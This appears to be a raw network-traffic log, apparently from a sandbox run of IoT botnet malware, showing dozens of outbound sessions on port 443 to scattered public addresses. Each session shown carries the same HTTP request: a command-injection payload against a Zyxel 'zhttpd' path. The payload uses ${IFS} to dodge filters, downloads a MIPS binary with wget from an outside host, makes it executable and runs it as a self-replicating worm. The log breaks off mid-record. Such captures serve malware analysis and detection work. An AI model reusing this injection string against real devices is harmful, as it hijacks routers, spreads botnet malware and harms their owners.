                                      Jan 19, 2024 17:29:40.944844007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6519192.168.2.1453284156.9.52.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944890022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6520192.168.2.1460022221.117.251.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944946051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6521192.168.2.143368095.13.206.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.944988966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6522192.168.2.1453214197.108.2.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945024967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6523192.168.2.1434908115.117.118.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945075035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6524192.168.2.14406524.239.233.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945106983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6525192.168.2.1455636106.125.237.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945163965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6526192.168.2.1436698132.252.15.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945211887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6527192.168.2.1435240157.49.226.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945259094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6528192.168.2.1444792119.161.172.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945306063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6529192.168.2.1448802208.240.28.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945333958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6530192.168.2.1459634112.255.162.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945383072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6531192.168.2.1447122153.105.179.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945430040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6532192.168.2.1445704136.20.151.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945457935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6533192.168.2.143719825.162.156.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945496082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6534192.168.2.144582687.245.45.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945523024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6535192.168.2.1449670148.145.98.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945569992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6536192.168.2.145054063.116.95.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945604086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6537192.168.2.1451008120.195.65.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945658922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6538192.168.2.143835291.190.182.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945710897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6539192.168.2.144821052.71.78.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945724964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6540192.168.2.1437064171.117.196.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945768118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6541192.168.2.145177075.230.99.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945831060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6542192.168.2.1452512118.9.115.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945831060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6543192.168.2.1440414220.40.183.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945843935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6544192.168.2.1447378211.254.33.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945873976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6545192.168.2.146080842.4.172.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945918083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6546192.168.2.143904098.13.200.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.945954084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6547192.168.2.1454436132.126.166.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946007967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6548192.168.2.1434604115.138.114.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946054935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6549192.168.2.145393854.181.159.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946089029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6550192.168.2.145808465.38.124.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946140051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6551192.168.2.145324236.10.222.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946196079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6552192.168.2.1444292157.171.211.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946223021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6553192.168.2.1434948117.77.251.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946242094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6554192.168.2.1440752186.40.210.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946300030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6555192.168.2.143936479.85.211.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946330070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6556192.168.2.1442642112.200.170.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.946372032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6557192.168.2.1447172197.77.24.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.949527025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6558192.168.2.143311072.153.21.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.956563950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6559192.168.2.1433766110.124.103.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.956852913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6560192.168.2.1459726119.147.71.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.956887960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6561192.168.2.1443188133.134.125.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.956942081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6562192.168.2.1460948201.155.72.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.956973076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6563192.168.2.1433000216.177.231.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957022905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6564192.168.2.144882263.70.139.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957055092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6565192.168.2.145356650.164.25.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957087040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6566192.168.2.1453078172.240.75.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957145929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6567192.168.2.143622862.136.30.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957182884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6568192.168.2.1433088176.0.169.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957216978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6569192.168.2.1451704191.83.50.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957247019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6570192.168.2.1450362147.179.124.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957304955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6571192.168.2.145990853.222.109.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957330942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6572192.168.2.144061280.143.14.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957386971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6573192.168.2.143558831.238.98.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957417011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6574192.168.2.145277085.104.194.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957452059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6575192.168.2.145932474.114.177.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957503080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6576192.168.2.145924662.136.43.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957535982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6577192.168.2.145256894.55.171.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957592964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6578192.168.2.1434998204.121.239.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957624912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6579192.168.2.1451634106.243.116.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957675934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6580192.168.2.1455274188.69.39.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957707882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6581192.168.2.1437304123.29.25.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.957755089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6582192.168.2.1444690221.101.114.128443
                                      TimestampBytes transferredDirectionData
